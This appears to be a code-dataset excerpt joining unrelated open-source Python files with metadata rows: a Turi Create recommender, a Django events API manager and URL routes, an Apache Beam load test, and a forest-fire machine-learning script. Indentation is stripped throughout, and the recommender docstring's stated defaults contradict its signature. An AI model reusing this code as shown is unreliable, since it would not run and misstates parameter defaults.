from turicreate.toolkits._model import _get_default_options_wrapper
def create(observation_data,
user_id='user_id', item_id='item_id', target=None,
user_data=None, item_data=None,
num_factors=32,
regularization=1e-9,
linear_regularization=1e-9,
side_data_factorization=True,
ranking_regularization=0.25,
unobserved_rating_value=None,
num_sampled_negative_examples=4,
max_iterations=25,
sgd_step_size=0,
random_seed=0,
binary_target = False,
solver = 'auto',
verbose=True,
**kwargs):
"""Create a RankingFactorizationRecommender that learns latent factors for each
user and item and uses them to make rating predictions.
Parameters
----------
observation_data : SFrame
The dataset to use for training the model. It must contain a column of
user ids and a column of item ids. Each row represents an observed
interaction between the user and the item. The (user, item) pairs
are stored with the model so that they can later be excluded from
recommendations if desired. It can optionally contain a target ratings
column. All other columns are interpreted by the underlying model as
side features for the observations.
The user id and item id columns must be of type 'int' or 'str'. The
target column must be of type 'int' or 'float'.
user_id : string, optional
The name of the column in `observation_data` that corresponds to the
user id.
item_id : string, optional
The name of the column in `observation_data` that corresponds to the
item id.
target : string, optional
The `observation_data` can optionally contain a column of scores
representing ratings given by the users. If present, the name of this
column may be specified variables `target`.
user_data : SFrame, optional
Side information for the users. This SFrame must have a column with
the same name as what is specified by the `user_id` input parameter.
`user_data` can provide any amount of additional user-specific
information.
item_data : SFrame, optional
Side information for the items. This SFrame must have a column with
the same name as what is specified by the `item_id` input parameter.
`item_data` can provide any amount of additional item-specific
information.
num_factors : int, optional
Number of latent factors.
regularization : float, optional
L2 regularization for interaction terms. Default: 1e-10; a typical range
for this parameter is between 1e-12 and 1. Setting this to 0 may cause
numerical issues.
linear_regularization : float, optional
L2 regularization for linear term. Default: 1e-10; a typical range for this
parameter is between 1e-12 and 1. Setting this to 0 may cause numerical issues.
side_data_factorization : boolean, optional
Use factorization for modeling any additional features beyond the user
and item columns. If True, and side features or any additional columns are
present, then a Factorization Machine model is trained. Otherwise, only
the linear terms are fit to these features. See
:class:`turicreate.recommender.ranking_factorization_recommender.RankingFactorizationRecommender`
for more information. Default: True.
ranking_regularization : float, optional
Penalize the predicted value of user-item pairs not in the
training set. Larger values increase this penalization.
Suggested values: 0, 0.1, 0.5, 1. NOTE: if no target column
is present, this parameter is ignored.
unobserved_rating_value : float, optional
Penalize unobserved items with a larger predicted score than this value.
By default, the estimated 5% quantile is used (mean - 1.96*std_dev).
num_sampled_negative_examples : integer, optional
For each (user, item) pair in the data, the ranking sgd solver evaluates
this many randomly chosen unseen items for the negative example step.
Increasing this can give better performance at the expense of speed,
particularly when the number of items is large. Default is 4.
binary_target : boolean, optional
Assume the target column is composed of 0's and 1's. If True, use
logistic loss to fit the model.
max_iterations : int, optional
The training algorithm will make at most this many iterations through
the observed data. Default: 50.
sgd_step_size : float, optional
Step size for stochastic gradient descent. Smaller values generally
lead to more accurate models that take more time to train. The
default setting of 0 means that the step size is chosen by trying
several options on a small subset of the data.
random_seed : int, optional
The random seed used to choose the initial starting point for
model training. Note that some randomness in the training is
unavoidable, so models trained with the same random seed may still
differ. Default: 0.
solver : string, optional
Name of the solver to be used to solve the regression. See the
references for more detail on each solver. The available solvers for
this model are:
- *auto (default)*: automatically chooses the best solver for the data
and model parameters.
- *ials*: Implicit Alternating Least Squares [1].
- *adagrad*: Adaptive Gradient Stochastic Gradient Descent.
- *sgd*: Stochastic Gradient Descent
verbose : bool, optional
Enables verbose output.
kwargs : optional
Optional advanced keyword arguments passed in to the model
optimization procedure. These parameters do not typically
need to be changed.
Examples
--------
**Basic usage**
When given just user and item pairs, one can create a RankingFactorizationRecommender
as follows.
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"])
>>> from turicreate.recommender import ranking_factorization_recommender
>>> m1 = ranking_factorization_recommender.create(sf)
When a target column is present, one can include this to try and recommend
items that are rated highly.
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"],
... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]})
>>> m1 = ranking_factorization_recommender.create(sf, target='rating')
**Including side features**
>>> user_info = turicreate.SFrame({'user_id': ["0", "1", "2"],
... 'name': ["Alice", "Bob", "Charlie"],
... 'numeric_feature': [0.1, 12, 22]})
>>> item_info = turicreate.SFrame({'item_id': ["a", "b", "c", "d"],
... 'name': ["item1", "item2", "item3", "item4"],
... 'dict_feature': [{'a' : 23}, {'a' : 13},
... {'b' : 1},
... {'a' : 23, 'b' : 32}]})
>>> m2 = ranking_factorization_recommender.create(sf, target='rating',
... user_data=user_info,
... item_data=item_info)
**Customizing ranking regularization**
Create a model that pushes predicted ratings of unobserved user-item
pairs toward 1 or below.
>>> m3 = ranking_factorization_recommender.create(sf, target='rating',
... ranking_regularization = 0.1,
... unobserved_rating_value = 1)
**Using the implicit alternating least squares model**
Ranking factorization also implements implicit alternating least squares [1] as
an alternative solver. This is enable using ``solver = 'ials'``.
>>> m3 = ranking_factorization_recommender.create(sf, target='rating',
solver = 'ials')
See Also
--------
:class:`turicreate.recommender.factorization_recommender.FactorizationRecommender`,
:class:`turicreate.recommender.ranking_factorization_recommender.RankingFactorizationRecommender`
References
-----------
[1] Collaborative Filtering for Implicit Feedback Datasets Hu, Y.; Koren,
Y.; Volinsky, C. IEEE International Conference on Data Mining
(ICDM 2008), IEEE (2008).
"""
from turicreate._cython.cy_server import QuietProgress
opts = {}
model_proxy = _turicreate.extensions.ranking_factorization_recommender()
model_proxy.init_options(opts)
if user_data is None:
user_data = _turicreate.SFrame()
if item_data is None:
item_data = _turicreate.SFrame()
nearest_items = _turicreate.SFrame()
if target is None:
binary_target = True
opts = {'user_id' : user_id,
'item_id' : item_id,
'target' : target,
'random_seed' : random_seed,
'num_factors' : num_factors,
'regularization' : regularization,
'linear_regularization' : linear_regularization,
'ranking_regularization' : ranking_regularization,
'binary_target' : binary_target,
'max_iterations' : max_iterations,
'side_data_factorization' : side_data_factorization,
'num_sampled_negative_examples' : num_sampled_negative_examples,
'solver' : solver,
# Has no effect here.
'sgd_step_size' : sgd_step_size}
if unobserved_rating_value is not None:
opts["unobserved_rating_value"] = unobserved_rating_value
if kwargs:
try:
possible_args = set(_get_default_options()["name"])
except (RuntimeError, KeyError):
possible_args = set()
bad_arguments = set(kwargs.keys()).difference(possible_args)
if bad_arguments:
raise TypeError("Bad Keyword Arguments: " + ', '.join(bad_arguments))
opts.update(kwargs)
extra_data = {"nearest_items" : _turicreate.SFrame()}
with QuietProgress(verbose):
model_proxy.train(observation_data, user_data, item_data, opts, extra_data)
return RankingFactorizationRecommender(model_proxy)
_get_default_options = _get_default_options_wrapper(
'ranking_factorization_recommender',
'recommender.RankingFactorizationRecommender',
'RankingFactorizationRecommender')
class RankingFactorizationRecommender(_Recommender):
r"""
A RankingFactorizationRecommender learns latent factors for each
user and item and uses them to rank recommended items according to
the likelihood of observing those (user, item) pairs. This is
commonly desired when performing collaborative filtering for
implicit feedback datasets or datasets with explicit ratings
for which ranking prediction is desired.
RankingFactorizationRecommender contains a number of options that
tailor to a variety of datasets and evaluation metrics, making
this one of the most powerful models in the Turi Create
recommender toolkit.
**Creating a RankingFactorizationRecommender**
This model cannot be constructed directly. Instead, use
:func:`turicreate.recommender.ranking_factorization_recommender.create`
to create an instance
of this model. A detailed list of parameter options and code samples
are available in the documentation for the create function.
**Side information**
Side features may be provided via the `user_data` and `item_data` options
when the model is created.
Additionally, observation-specific information, such as the time of day when
the user rated the item, can also be included. Any column in the
`observation_data` SFrame that is not the user id, item id, or target is
treated as a observation side features. The same side feature columns must
be present when calling :meth:`predict`.
Side features may be numeric or categorical. User ids and item ids are
treated as categorical variables. For the additional side features, the type
of the :class:`~turicreate.SFrame` column determines how it's handled: strings
are treated as categorical variables and integers and floats are treated as
numeric variables. Dictionaries and numeric arrays are also supported.
**Optimizing for ranking performance**
By default, RankingFactorizationRecommender optimizes for the
precision-recall performance of recommendations.
**Model parameters**
Trained model parameters may be accessed using
`m.get('coefficients')` or equivalently `m['coefficients']`, where `m`
is a RankingFactorizationRecommender.
See Also
--------
create, :func:`turicreate.recommender.factorization_recommender.create`
Notes
-----
**Model Details**
`RankingFactorizationRecommender` trains a model capable of predicting a score for
each possible combination of users and items. The internal coefficients of
the model are learned from known scores of users and items.
Recommendations are then based on these scores.
In the two factorization models, users and items are represented by weights
and factors. These model coefficients are learned during training.
Roughly speaking, the weights, or bias terms, account for a user or item's
bias towards higher or lower ratings. For example, an item that is
consistently rated highly would have a higher weight coefficient associated
with them. Similarly, an item that consistently receives below average
ratings would have a lower weight coefficient to account for this bias.
The factor terms model interactions between users and items. For example,
if a user tends to love romance movies and hate action movies, the factor
terms attempt to capture that, causing the model to predict lower scores
for action movies and higher scores for romance movies. Learning good
weights and factors is controlled by several options outlined below.
More formally, the predicted score for user :math:`i` on item :math:`j` is
given by
.. math::
\operatorname{score}(i, j) =
\mu + w_i + w_j
+ \mathbf{a}^T \mathbf{x}_i + \mathbf{b}^T \mathbf{y}_j
+ {\mathbf u}_i^T {\mathbf v}_j,
where :math:`\mu` is a global bias term, :math:`w_i` is the weight term for
user :math:`i`, :math:`w_j` is the weight term for item :math:`j`,
:math:`\mathbf{x}_i` and :math:`\mathbf{y}_j` are respectively the user and
item side feature vectors, and :math:`\mathbf{a}` and :math:`\mathbf{b}`
are respectively the weight vectors for those side features.
The latent factors, which are vectors of length ``num_factors``, are given
by :math:`{\mathbf u}_i` and :math:`{\mathbf v}_j`.
**Training the model**
The model is trained using Stochastic Gradient Descent with additional
tricks to improve convergence. The optimization is done in parallel
over multiple threads. This procedure is inherently random, so different
calls to `create()` may return slightly different models, even with the
same `random_seed`.
In the explicit rating case, the objective function we are
optimizing for is:
.. math::
\min_{\mathbf{w}, \mathbf{a}, \mathbf{b}, \mathbf{V}, \mathbf{U}}
\frac{1}{|\mathcal{D}|} \sum_{(i,j,r_{ij}) \in \mathcal{D}}
\mathcal{L}(\operatorname{score}(i, j), r_{ij})
+ \lambda_1 (\lVert {\mathbf w} \rVert^2_2 + || {\mathbf a} ||^2_2 + || {\mathbf b} ||^2_2 )
+ \lambda_2 \left(\lVert {\mathbf U} \rVert^2_2
+ \lVert {\mathbf V} \rVert^2_2 \right)
where :math:`\mathcal{D}` is the observation dataset, :math:`r_{ij}` is the
rating that user :math:`i` gave to item :math:`j`,
:math:`{\mathbf U} = ({\mathbf u}_1, {\mathbf u}_2, ...)` denotes the user's
latent factors and :math:`{\mathbf V} = ({\mathbf v}_1, {\mathbf v}_2, ...)`
denotes the item latent factors. The loss function
:math:`\mathcal{L}(\hat{y}, y)` is :math:`(\hat{y} - y)^2` by default.
:math:`\lambda_1` denotes the `linear_regularization` parameter and
:math:`\lambda_2` the `regularization` parameter.
When ``ranking_regularization`` is nonzero, then the equation
above gets an additional term. Let :math:`\lambda_{\text{rr}}` represent
the value of `ranking_regularization`, and let
:math:`v_{\text{ur}}` represent `unobserved_rating_value`. Then the
objective we attempt to minimize is:
.. math::
\min_{\mathbf{w}, \mathbf{a}, \mathbf{b}, \mathbf{V}, \mathbf{U}}
\frac{1}{|\mathcal{D}|} \sum_{(i,j,r_{ij}) \in \mathcal{D}}
\mathcal{L}(\operatorname{score}(i, j), r_{ij})
+ \lambda_1 (\lVert {\mathbf w} \rVert^2_2 + || {\mathbf a} ||^2_2 + || {\mathbf b} ||^2_2 )
+ \lambda_2 \left(\lVert {\mathbf U} \rVert^2_2
+ \lVert {\mathbf V} \rVert^2_2 \right) \\
+ \frac{\lambda_{rr}}{\text{const} * |\mathcal{U}|}
\sum_{(i,j) \in \mathcal{U}}
\mathcal{L}\left(\operatorname{score}(i, j), v_{\text{ur}}\right),
where :math:`\mathcal{U}` is a sample of unobserved user-item pairs.
In the implicit case when there are no target values, we use
logistic loss to fit a model that attempts to predict all the
given (user, item) pairs in the training data as 1 and all others
as 0. To train this model, we sample an unobserved item along
with each observed (user, item) pair, using SGD to push the score
of the observed pair towards 1 and the unobserved pair towards 0.
In this case, the `ranking_regularization` parameter is ignored.
When `binary_targets=True`, then the target values must be 0 or 1;
in this case, we also use logistic loss to train the model so the
predicted scores are as close to the target values as possible.
This time, the rating of the sampled unobserved pair is set to 0
(thus the `unobserved_rating_value` is ignored). In this case,
the loss on the unobserved pairs is weighted by
`ranking_regularization` as in the non-binary case.
To choose the unobserved pair complementing a given observation,
the algorithm selects several (defaults to four) candidate
negative items that the user in the given observation has not
rated. The algorithm scores each one using the current model, then
chooses the item with the largest predicted score. This adaptive
sampling strategy provides faster convergence than just sampling a
single negative item.
The Factorization Machine is a generalization of Matrix
Factorization. Like matrix factorization, it predicts target
rating values as a weighted combination of user and item latent
factors, biases, side features, and their pairwise combinations.
In particular, while Matrix Factorization learns latent factors
for only the user and item interactions, the Factorization Machine
learns latent factors for all variables, including side features,
and also allows for interactions between all pairs of
variables. Thus the Factorization Machine is capable of modeling
complex relationships in the data. Typically, using
`linear_side_features=True` performs better in terms of RMSE, but
may require a longer training time.
num_sampled_negative_examples: For each (user, item) pair in the data, the
ranking sgd solver evaluates this many randomly chosen unseen items for the
negative example step. Increasing this can give better performance at the
expense of speed, particularly when the number of items is large.
When `ranking_regularization` is larger than zero, the model samples
a small set of unobserved user-item pairs and attempts to drive their rating
predictions below the value specified with `unobserved_rating_value`.
This has the effect of improving the precision-recall performance of
recommended items.
** Implicit Matrix Factorization**
`RankingFactorizationRecommender` had an additional option of optimizing
for ranking using the implicit matrix factorization model. The internal coefficients of
the model and its interpretation are identical to the model described above.
The difference between the two models is in the nature in which the objective
is achieved. Currently, this model does not incorporate any columns
beyond user/item (and rating) or side data.
The model works by transferring the raw observations (or weights) (r) into
two separate magnitudes with distinct interpretations: preferences (p) and
confidence levels (c). The functional relationship between the weights (r)
and the confidence is either linear or logarithmic which can be toggled
by setting `ials_confidence_scaling_type` = `linear` (the default) or `log`
respectively. The rate of increase of the confidence with respect to the
weights is proportional to the `ials_confidence_scaling_factor`
(default 1.0).
Examples
--------
**Basic usage**
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"],
... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]})
>>> m1 = turicreate.ranking_factorization_recommender.create(sf, target='rating')
For implicit data, no target column is specified:
>>> sf = turicreate.SFrame({'user': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'movie': ["a", "b", "c", "a", "b", "b", "c", "d"]})
>>> m2 = turicreate.ranking_factorization_recommender.create(sf, 'user', 'movie')
**Implicit Matrix Factorization**
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"],
... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]})
>>> m1 = turicreate.ranking_factorization_recommender.create(sf, target='rating',
solver='ials')
For implicit data, no target column is specified:
>>> sf = turicreate.SFrame({'user': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'movie': ["a", "b", "c", "a", "b", "b", "c", "d"]})
>>> m2 = turicreate.ranking_factorization_recommender.create(sf, 'user', 'movie',
solver='ials')
**Including side features**
>>> user_info = turicreate.SFrame({'user_id': ["0", "1", "2"],
... 'name': ["Alice", "Bob", "Charlie"],
... 'numeric_feature': [0.1, 12, 22]})
>>> item_info = turicreate.SFrame({'item_id': ["a", "b", "c", "d"],
... 'name': ["item1", "item2", "item3", "item4"],
... 'dict_feature': [{'a' : 23}, {'a' : 13},
... {'b' : 1},
... {'a' : 23, 'b' : 32}]})
>>> m2 = turicreate.ranking_factorization_recommender.create(sf,
... target='rating',
... user_data=user_info,
... item_data=item_info)
**Optimizing for ranking performance**
Create a model that pushes predicted ratings of unobserved user-item
pairs toward 1 or below.
>>> m3 = turicreate.ranking_factorization_recommender.create(sf,
... target='rating',
... ranking_regularization = 0.1,
... unobserved_rating_value = 1)
"""
def __init__(self, model_proxy):
'''__init__(self)'''
self.__proxy__ = model_proxy
@classmethod
def _native_name(cls):
return "ranking_factorization_recommender"
| 46.229242 | 105 | 0.640233 |
a5c6bf8b12b083488ccb5fddf9ee20aeaf816653 | 3,918 | py | Python | copilot/events/api_models.py | febsn/djangocms-copilot | e4b268ad522d972333b037ef8a1c317cc537da9e | [
"MIT"
] | null | null | null | copilot/events/api_models.py | febsn/djangocms-copilot | e4b268ad522d972333b037ef8a1c317cc537da9e | [
"MIT"
] | null | null | null | copilot/events/api_models.py | febsn/djangocms-copilot | e4b268ad522d972333b037ef8a1c317cc537da9e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime, date
from copilot.conf import settings
from copilot.api import CopilotClient
from copilot.base_api_models import BaseApiManager
class EventManager(BaseApiManager):
ALL_ENDPOINT = 'events/'
ARTIST_ENDPOINT = 'artists/{id}/events/'
SORTING = 'dateOfEvent,asc'
FROM = 'from/{}/'
ARTIST_FROM = '{}/'
TO = 'to/{}/'
ARTIST_TO = '{}/'
def _get_from(self):
if self.artist_id:
return self.ARTIST_FROM
else:
return self.FROM
def _get_to(self):
if self.artist_id:
return self.ARTIST_TO
else:
return self.TO
def _get_endpoint(self, **kwargs):
endpoint = super(EventManager, self)._get_endpoint(**kwargs)
try:
start_date = kwargs['start_date']
endpoint += self._get_from().format(start_date.isoformat())
# the API allows only calls with start_date AND end_date, or neither of them.
# If there is only start_date given, we assume a delta of one year.
endpoint += self._get_to().format(
kwargs.get('end_date', date(start_date.year+1, start_date.month, start_date.day)).isoformat()
)
except KeyError:
# no problem if start_date and end_date not given
pass
return endpoint
def _get(self, endpoint, **kwargs):
kwargs['external'] = False
events = super(EventManager, self)._get(endpoint, **kwargs)
events['artists'] = {}
for event in events['content']:
try:
event['dateOfEvent'] = datetime.strptime(event['dateOfEvent']+event['start'], '%Y-%m-%d%H:%M:%S.%f')
except KeyError:
try:
event['dateOfEvent'] = datetime.strptime(event['dateOfEvent'], '%Y-%m-%d')
except KeyError:
pass
for cast_item in event['cast']:
try:
events['artists'][cast_item['artist']['id']]['events'].append(event)
except KeyError:
events['artists'][cast_item['artist']['id']] = {
'artist': cast_item['artist'],
'events': [event, ]
}
return events
def _get_years(self):
endpoint = self._get_endpoint()
events = self._get(endpoint)
years = {}
for event in events:
try:
years[event['dateOfEvent'].year].append(event)
except KeyError:
years[event['dateOfEvent'].year] = [event, ]
return years
def year(self, year=None):
"""
Return events for year `year`.
"""
if year is None:
year = datetime.now().year
endpoint = self._get_endpoint(
start_date=date(year, 1, 1),
end_date=date(year, 12, 31)
)
return self._get(endpoint)
def prevnext(self, year=None):
"""
Return events for year `year` and one year before and after.
"""
if year is None:
year = datetime.now().year
endpoint = self._get_endpoint(
start_date=date(year-1, 1, 1),
end_date=date(year+1, 12, 31)
)
return self._get(endpoint)
@property
def years(self):
try:
return self._years
except AttributeError:
self._years = self._get_years()
return self._years
def upcoming(self, **kwargs):
endpoint = self._get_endpoint(
start_date=datetime.now().date())
return self._get(endpoint, **kwargs)
def __str__(self):
if self.artist_id:
return 'EventManager for {}'.format(self.artist_id)
else:
return 'EventManager'
| 31.596774 | 116 | 0.545942 |
658ef5156c6bc6fe60a06664d23eead8bb8a47b5 | 1,214 | py | Python | api/mfwgallery/urls-dev.py | ankkamies/mfwgallery-api | c03d20b24fd4ef5d3e9be173b917eea493a5c3d6 | [
"MIT"
] | null | null | null | api/mfwgallery/urls-dev.py | ankkamies/mfwgallery-api | c03d20b24fd4ef5d3e9be173b917eea493a5c3d6 | [
"MIT"
] | null | null | null | api/mfwgallery/urls-dev.py | ankkamies/mfwgallery-api | c03d20b24fd4ef5d3e9be173b917eea493a5c3d6 | [
"MIT"
] | null | null | null | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from mfwgallery import settings
from rest_framework.routers import SimpleRouter
from rest_framework_nested import routers
from posts import views
# Initialize routes
router = routers.SimpleRouter()
router.register(r'posts', views.PostViewSet)
router.register(r'tags', views.TagViewSet)
router.register(r'users', views.UserViewSet)
router.register(r'images', views.ImageViewSet)
# Initialize nested routes
users_router = routers.NestedSimpleRouter(router, r'users', lookup='user')
users_router.register(r'posts', views.UserPostViewSet)
posts_router = routers.NestedSimpleRouter(router, r'posts', lookup='post')
posts_router.register(r'comments', views.CommentViewSet)
posts_router.register(r'tags', views.PostTagViewSet)
# Create URL patterns
urlpatterns = patterns('',
url(r'^api/', include(router.urls)),
url(r'^api/', include(posts_router.urls)),
url(r'^api/', include(users_router.urls)),
url(r'^api/auth/login/$', views.LoginView.as_view()),
url(r'^api/auth/register/$', views.RegisterView.as_view()),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 35.705882 | 74 | 0.76112 |
371f52e69d239065ca75793860fd46c1cbdfb669 | 5,426 | py | Python | sdks/python/apache_beam/testing/load_tests/combine_test.py | a-satyateja/beam | 30a04b912979adf5f316cc8ace334d921ca71838 | [
"Apache-2.0"
] | 2 | 2019-06-03T02:47:29.000Z | 2019-06-12T21:22:41.000Z | sdks/python/apache_beam/testing/load_tests/combine_test.py | a-satyateja/beam | 30a04b912979adf5f316cc8ace334d921ca71838 | [
"Apache-2.0"
] | 7 | 2020-01-28T22:46:48.000Z | 2022-02-10T00:10:51.000Z | sdks/python/apache_beam/testing/load_tests/combine_test.py | a-satyateja/beam | 30a04b912979adf5f316cc8ace334d921ca71838 | [
"Apache-2.0"
] | 6 | 2019-06-02T16:18:52.000Z | 2020-11-04T04:17:08.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This is Combine load test with Synthetic Source. Besides of the standard
input options there are additional options:
* fanout (optional) - number of GBK operations to run in parallel
* project (optional) - the gcp project in case of saving
metrics in Big Query (in case of Dataflow Runner
it is required to specify project of runner),
* publish_to_big_query - if metrics should be published in big query,
* metrics_namespace (optional) - name of BigQuery dataset where metrics
will be stored,
* metrics_table (optional) - name of BigQuery table where metrics
will be stored,
* input_options - options for Synthetic Sources.
Example test run on DirectRunner:
python setup.py nosetests \
--test-pipeline-options="
--project=big-query-project
--publish_to_big_query=true
--metrics_dataset=python_load_tests
--metrics_table=combine
--fanout=1
--input_options='{
\"num_records\": 300,
\"key_size\": 5,
\"value_size\":15,
\"bundle_size_distribution_type\": \"const\",
\"bundle_size_distribution_param\": 1,
\"force_initial_num_bundles\": 0
}'" \
--tests apache_beam.testing.load_tests.combine_test
or:
./gradlew -PloadTest.args='
--publish_to_big_query=true
--project=...
--metrics_dataset=python_load_test
--metrics_table=combine
--input_options=\'
{"num_records": 1,
"key_size": 1,
"value_size":1,
"bundle_size_distribution_type": "const",
"bundle_size_distribution_param": 1,
"force_initial_num_bundles": 1}\'
--runner=DirectRunner
--fanout=1' \
-PloadTest.mainClass=apache_beam.testing.load_tests.combine_test \
-Prunner=DirectRunner :sdks:python:apache_beam:testing:load-tests:run
To run test on other runner (ex. Dataflow):
python setup.py nosetests \
--test-pipeline-options="
--runner=TestDataflowRunner
--fanout=1
--project=...
--staging_location=gs://...
--temp_location=gs://...
--sdk_location=./dist/apache-beam-x.x.x.dev0.tar.gz
--publish_to_big_query=true
--metrics_dataset=python_load_tests
--metrics_table=combine
--input_options='{
\"num_records\": 1000,
\"key_size\": 5,
\"value_size\":15,
\"bundle_size_distribution_type\": \"const\",
\"bundle_size_distribution_param\": 1,
\"force_initial_num_bundles\": 0
}'" \
--tests apache_beam.testing.load_tests.combine_test
or:
./gradlew -PloadTest.args='
--publish_to_big_query=true
--project=...
--metrics_dataset=python_load_tests
--metrics_table=combine
--temp_location=gs://...
--input_options=\'
{"num_records": 1,
"key_size": 1,
"value_size":1,
"bundle_size_distribution_type": "const",
"bundle_size_distribution_param": 1,
"force_initial_num_bundles": 1}\'
--runner=TestDataflowRunner
--fanout=1' \
-PloadTest.mainClass=
apache_beam.testing.load_tests.combine_test \
-Prunner=
TestDataflowRunner :sdks:python:apache_beam:testing:load-tests:run
"""
from __future__ import absolute_import
import logging
import os
import unittest
import apache_beam as beam
from apache_beam.testing import synthetic_pipeline
from apache_beam.testing.load_tests.load_test import LoadTest
from apache_beam.testing.load_tests.load_test_metrics_utils import MeasureTime
load_test_enabled = False
if os.environ.get('LOAD_TEST_ENABLED') == 'true':
load_test_enabled = True
@unittest.skipIf(not load_test_enabled, 'Enabled only for phrase triggering.')
class CombineTest(LoadTest):
def setUp(self):
super(CombineTest, self).setUp()
self.fanout = self.pipeline.get_option('fanout')
if self.fanout is None:
self.fanout = 1
else:
self.fanout = int(self.fanout)
class _GetElement(beam.DoFn):
def process(self, element):
yield element
def testCombineGlobally(self):
input = (self.pipeline
| beam.io.Read(synthetic_pipeline.SyntheticSource(
self.parseTestPipelineOptions()))
| 'Measure time: Start' >> beam.ParDo(
MeasureTime(self.metrics_namespace))
)
for branch in range(self.fanout):
# pylint: disable=expression-not-assigned
(input
| 'Combine with Top %i' % branch >> beam.CombineGlobally(
beam.combiners.TopCombineFn(1000))
| 'Consume %i' % branch >> beam.ParDo(self._GetElement())
| 'Measure time: End %i' % branch >> beam.ParDo(
MeasureTime(self.metrics_namespace))
)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| 32.491018 | 78 | 0.697383 |
a28ce3c76b96b4f00e948f99fed3718c672500f0 | 3,388 | py | Python | training.py | Utkarsh-Shakya/Capstone_Project | ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536 | [
"MIT"
] | null | null | null | training.py | Utkarsh-Shakya/Capstone_Project | ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536 | [
"MIT"
] | null | null | null | training.py | Utkarsh-Shakya/Capstone_Project | ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
#Importing required libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[ ]:
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
# In[ ]:
#For ignoring warnings
import warnings
warnings.filterwarnings(action='ignore')
# # Data Pre-processing
# In[ ]:
#Reading the dataset
df=pd.read_csv('forestfires.csv')
# In[ ]:
#Function for pre-processing data according to regression or classification
def preprocessing(df, task="regression"):
df=pd.read_csv('forestfires.csv')
#Converting String values of month and day into Integer
month = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec':12,}
df['month'] = df['month'].map(month)
day = {'sun':1, 'mon':2, 'tue':3, 'wed':4, 'thu':5, 'fri':6, 'sat':7,}
df['day'] = df['day'].map(day)
#Converting target feature according to training model used
if(task=="regression"):
#Using Log Transformation to reduce skewness of the target feature
df['area']=np.log(df['area']+1)
X = df.drop(["area"], axis=1)
y = df['area']
#If model is classification, then converting area burnt into 1(if it is greater than 0) else 0
elif(task=="classification"):
X = df.drop("area", axis=1)
y = df['area'].apply(lambda x:1 if x>0 else 0)
#If model is clustering, then storing values of two most important input features(DMC and temp)
elif(task=="clustering"):
X = df.iloc[1:500, [5,8]].values
y= None
else:
raise Exception("Enter regression, classification or clustering")
#Scaling the input features
scaler=StandardScaler()
scaler.fit(X)
if(task=="regression" or task=="classification"):
X=pd.DataFrame(scaler.transform(X), columns=X.columns)
return X, y
# # Training the model
# In[ ]:
#Defining model training functions for regression and classification
def supervised_method(X,y, task="regression"):
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, shuffle=True, random_state=1)
if (task=="regression"):
model=LinearRegression()
model.fit(X_train,y_train)
elif (task=="classification"):
model=LogisticRegression()
model.fit(X_train,y_train)
else:
raise Exception("Enter regression or classification")
return model
# In[70]:
#Defining model training functions for clustering
def unsupervised_method(X):
model = KMeans(n_clusters=4, init='random', random_state=0)
y_km = model.fit_predict(X)
plt.scatter(X[y_km==0,0],X[y_km==0,1],s=20,c='green',marker='x',label='Very low Fire')
plt.scatter(X[y_km==1,0],X[y_km==1,1],s=20,c='orange',marker='x',label='Low Fire')
plt.scatter(X[y_km==2,0],X[y_km==2,1],s=20,c='blue',marker='x',label='Medium Fire')
plt.scatter(X[y_km==3,0],X[y_km==3,1],s=20,c='black',marker='x',label='High Fire')
plt.scatter(model.cluster_centers_[:,0],model.cluster_centers_[:,1],s=250,marker='*',c='red',label='centroids')
plt.legend()
plt.xlabel('DMC')
plt.ylabel('Temp')
plt.grid()
plt.show()
return model
| 26.677165 | 124 | 0.655549 |
70a893143160b49be182df7c4eb9ac945bd79def | 399 | py | Python | postfixadmin/postfixadmin/wsgi.py | fretscha/django-postfix-admin | 0474370fdd837ab34c8bf6ef03e02b66a54f3119 | [
"MIT"
] | 1 | 2015-01-24T13:29:58.000Z | 2015-01-24T13:29:58.000Z | postfixadmin/postfixadmin/wsgi.py | fretscha/django-postfix-admin | 0474370fdd837ab34c8bf6ef03e02b66a54f3119 | [
"MIT"
] | null | null | null | postfixadmin/postfixadmin/wsgi.py | fretscha/django-postfix-admin | 0474370fdd837ab34c8bf6ef03e02b66a54f3119 | [
"MIT"
